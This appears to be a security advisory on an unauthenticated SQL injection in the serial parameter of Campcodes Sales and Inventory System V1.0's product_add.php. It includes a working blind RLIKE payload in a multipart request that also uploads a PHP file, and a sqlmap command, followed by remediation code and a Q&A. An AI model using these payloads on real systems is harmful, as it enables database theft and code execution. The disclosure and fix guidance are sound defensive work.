Campcodes Sales And Inventory System V1.0 /pages/product_add.php SQL Injection

by ADMIN

Introduction

In this article, we will discuss a critical SQL injection vulnerability found in the Campcodes Sales and Inventory System V1.0, specifically in the /pages/product_add.php file. This vulnerability allows attackers to inject malicious SQL code, leading to unauthorized database access, leakage of sensitive data, and ultimately full control of the system.

Affected Product

The affected product is the Campcodes Sales and Inventory System V1.0, which can be downloaded from the vendor's website at https://www.campcodes.com/downloads/sales-and-inventory-system-with-credit-management-using-php-source-code/.

Vulnerability Details

The vulnerability is caused by the lack of proper input validation and sanitization of the serial parameter in the /pages/product_add.php file. This allows attackers to inject malicious SQL code, which is then executed by the database, resulting in unauthorized access to sensitive data.

Vulnerability Type

The vulnerability is classified as a SQL injection vulnerability, a type of web application security vulnerability in which attacker-controlled input is placed into the SQL text of a query the application sends to its database, so that the input is executed as SQL rather than treated as data.

Root Cause

The root cause of this vulnerability is the failure to properly validate and sanitize user input data, specifically the serial parameter. This allows attackers to inject malicious SQL code, which is then executed by the database.

Impact

The impact of this vulnerability is significant, as it allows attackers to:

  • Gain unauthorized access to sensitive data
  • Modify or delete data
  • Access sensitive information
  • Compromise the entire system

Description

During a security review of the Campcodes Sales and Inventory System V1.0, a critical SQL injection vulnerability was discovered in the /pages/product_add.php file. This vulnerability stems from the lack of proper input validation and sanitization of the serial parameter, allowing attackers to inject malicious SQL code.

No Login or Authorization Required

No login or authorization is required to exploit this vulnerability, making it a significant security risk.

Vulnerability Details and POC

The vulnerability details and proof of concept (POC) are as follows:

  • Vulnerability Name: serial parameter
  • Payload:
Parameter: MULTIPART serial ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="serial"

1' RLIKE (SELECT (CASE WHEN (1742=1742) THEN 1 ELSE 0x28 END)) AND 'WEhB'='WEhB
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="id"


------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_name"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_desc"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="supplier"

3
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_price"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="category"

8
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="reorder"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: text/php

<?php phpinfo();?>
------WebKitFormBoundary2x5hERo2zuaypyh9--
  • Screenshots:
sqlmap -u "http://172.20.10.2/ahira/pages/product_add.php"  -data="Content-Disposition: form-data; name="serial"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="id"


------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_name"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_desc"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="supplier"

3
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_price"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="category"

8
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="reorder"

1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: text/php

<?php phpinfo();?>" --dbs


Suggested Repair

To repair this vulnerability, the following steps should be taken:

  1. Use Prepared Statements and Parameter Binding: Prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. With a prepared statement, the value entered by the user is passed to the database as pure data and is never interpreted as SQL code.
  2. Input Validation and Filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize Database User Permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular Security Audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
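The root cause described above (user input concatenated into the SQL text of the query) and repair steps 1 to 3 (prepared statements, input validation, a least-privilege database account), shown together as an added example. This is not the Campcodes project's code: the advisory does not reproduce product_add.php, so the vulnerable handler below is a reconstruction of the pattern it describes, and the table name products, the column names, the serial format and the inv_web database account are assumptions.

```php
<?php
// Added example, not the Campcodes project's code. The vulnerable handler is an
// assumed reconstruction of the pattern the advisory describes (serial used in a
// WHERE clause without binding); table/column names and the serial format are assumptions.
declare(strict_types=1);

// --- Vulnerable pattern (assumed shape of the original) ---------------------
// The serial value is spliced into the SQL string. A single quote inside the
// value closes the string literal, and whatever follows is parsed as SQL, which
// is exactly what a boolean-based blind probe relies on.
function serialExistsVulnerable(mysqli $db, string $serial): bool
{
    $sql = "SELECT 1 FROM products WHERE serial = '" . $serial . "' LIMIT 1";
    $result = $db->query($sql);
    return $result !== false && $result->num_rows > 0;
}

// --- Repair step 2: validate the field against its expected format ------------
// Assumed format: 1 to 32 characters from letters, digits, dash and underscore.
// Reject anything else instead of trying to "clean" it.
function validateSerial(string $serial): ?string
{
    $serial = trim($serial);
    return preg_match('/^[A-Za-z0-9_-]{1,32}$/', $serial) === 1 ? $serial : null;
}

// --- Repair step 1: prepared statements with bound parameters ----------------
// The SQL text is sent to the server first and the value separately, so the
// value can only ever be compared against the column, never parsed as SQL.
function serialExistsSafe(mysqli $db, string $serial): bool
{
    $stmt = $db->prepare('SELECT 1 FROM products WHERE serial = ? LIMIT 1');
    $stmt->bind_param('s', $serial);
    $stmt->execute();
    $exists = (bool) $stmt->get_result()->fetch_row();
    $stmt->close();
    return $exists;
}

function addProductSafe(mysqli $db, array $post): bool
{
    $serial = validateSerial((string) ($post['serial'] ?? ''));
    if ($serial === null) {
        return false; // malformed serial: refuse the request
    }
    $name     = trim((string) ($post['prod_name'] ?? ''));
    $desc     = trim((string) ($post['prod_desc'] ?? ''));
    $supplier = filter_var($post['supplier'] ?? null, FILTER_VALIDATE_INT);
    $price    = filter_var($post['prod_price'] ?? null, FILTER_VALIDATE_FLOAT);
    $category = filter_var($post['category'] ?? null, FILTER_VALIDATE_INT);
    $reorder  = filter_var($post['reorder'] ?? null, FILTER_VALIDATE_INT);
    if ($name === '' || $supplier === false || $price === false
        || $category === false || $reorder === false) {
        return false;
    }
    if (serialExistsSafe($db, $serial)) {
        return false; // duplicate serial
    }

    $stmt = $db->prepare(
        'INSERT INTO products (serial, prod_name, prod_desc, supplier, prod_price, category, reorder)
         VALUES (?, ?, ?, ?, ?, ?, ?)'
    );
    // Type string: s = string, i = integer, d = double, one letter per placeholder.
    $stmt->bind_param('sssidii', $serial, $name, $desc, $supplier, $price, $category, $reorder);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// --- Repair step 3: connect with a least-privilege account -------------------
// Assumed account inv_web, created by the DBA with only what this page needs, e.g.:
//   CREATE USER 'inv_web'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT ON inventory.products TO 'inv_web'@'localhost';
// Errors become exceptions so a failed prepare() cannot silently fall through.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli('localhost', 'inv_web', getenv('INV_DB_PASS') ?: '', 'inventory');

// Illustrative wiring for the form post handled by product_add.php.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    http_response_code(addProductSafe($db, $_POST) ? 200 : 400);
}
```

With the bound parameter, a value such as the advisory's RLIKE probe is simply a serial that does not exist, and the validation step rejects it before the query is even built; the two layers are independent, so either one alone is enough to stop this particular injection, and together they also keep malformed data out of the table.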

Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL Injection Vulnerability: Q&A

Q: What is the Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL injection vulnerability?

A: The Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL injection vulnerability is a critical security vulnerability that allows attackers to inject malicious SQL code into the database, resulting in unauthorized access to sensitive data.

Q: What is the root cause of this vulnerability?

A: The root cause of this vulnerability is the failure to properly validate and sanitize user input data, specifically the serial parameter.

Q: What are the potential impacts of this vulnerability?

A: The potential impacts of this vulnerability include:

  • Unauthorized access to sensitive data
  • Modification or deletion of data
  • Exposure of sensitive information
  • Compromise of the entire system

Q: Is login or authorization required to exploit this vulnerability?

A: No, login or authorization is not required to exploit this vulnerability.

Q: What is the recommended repair for this vulnerability?

A: The recommended repair for this vulnerability includes:

  1. Use Prepared Statements and Parameter Binding: Prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. With a prepared statement, the value entered by the user is passed to the database as pure data and is never interpreted as SQL code.
  2. Input Validation and Filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize Database User Permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular Security Audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Q: What are the potential consequences of not repairing this vulnerability?

A: The potential consequences of not repairing this vulnerability include:

  • Unauthorized access to sensitive data
  • Data tampering or deletion
  • System compromise
  • Business disruption

Q: How can I prevent similar vulnerabilities in the future?

A: To prevent similar vulnerabilities in the future, follow these best practices:

  • Use prepared statements and parameter binding
  • Validate and filter user input data
  • Minimize database user permissions
  • Regularly conduct code and system security audits

Q: What is the recommended course of action for users who have already been affected by this vulnerability?

A: If you have already been affected by this vulnerability, take the following steps:

  • Immediately repair the vulnerability by implementing the recommended repairs
  • Conduct a thorough security audit to identify and fix any other potential vulnerabilities
  • Notify affected parties and take steps to mitigate any potential damage

Q: Where can I find more information about this vulnerability?

A: For more information about this vulnerability, visit the following resources: